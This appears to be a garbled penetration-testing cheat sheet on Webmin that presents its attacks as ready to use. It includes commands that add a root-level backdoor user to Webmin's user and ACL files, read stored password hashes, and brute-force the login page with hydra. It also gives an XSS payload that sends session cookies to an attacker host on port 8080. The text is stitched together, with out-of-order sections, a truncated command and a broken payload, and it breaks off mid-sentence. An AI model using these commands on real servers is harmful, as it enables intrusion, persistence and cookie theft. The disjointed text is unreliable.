Webmin Hacktricks, Jun 2026

Webmin is a treasure trove for attackers: it combines powerful system access with a web interface prone to historical RCE flaws. From default credentials to session hijacking and post-exploitation module abuse, mastering Webmin is a must for any penetration tester. Use these techniques to assess, exploit, and pivot, but always ensure you have explicit permission before testing.

cat /etc/webmin/miniserv.users # Format: user:encrypted_pass

Using the module:

# Download vulnerable Webmin
docker run -it -p 10000:10000 vulhub/webmin:1.920

Less-privileged Webmin users can often access the File Manager, which, when poorly configured, allows reading /etc/shadow or writing unauthorized files, leading to full system takeover.

3. Webmin Security Testing: A "Hacktricks" Approach

echo "backdoor:\$1\$somehash:0" >> /etc/webmin/miniserv.users
echo "backdoor:Backdoor User:acl" >> /etc/webmin/webmin.acl

hydra -l root -P /usr/share/wordlists/rockyou.txt https://target:10000 /session_login.cgi -m "page=1&user=^USER^&pass=^PASS^" -V -I

cat /etc/webmin/miniserv

<img src=x onerror="fetch('/sysinfo.cgi?xss=<script>new Image().src='http://attacker:8080/?'+document.cookie</script>')">

Verify that Webmin Configuration > Trusted Referrers is enabled to prevent XSS/CSRF.

Webmin has a history of specific vulnerability types. Understanding these is key to securing the server.

update.cgi RCE via u' parameter injection. Requires an authenticated user.

Once you have root (Webmin runs as root by default):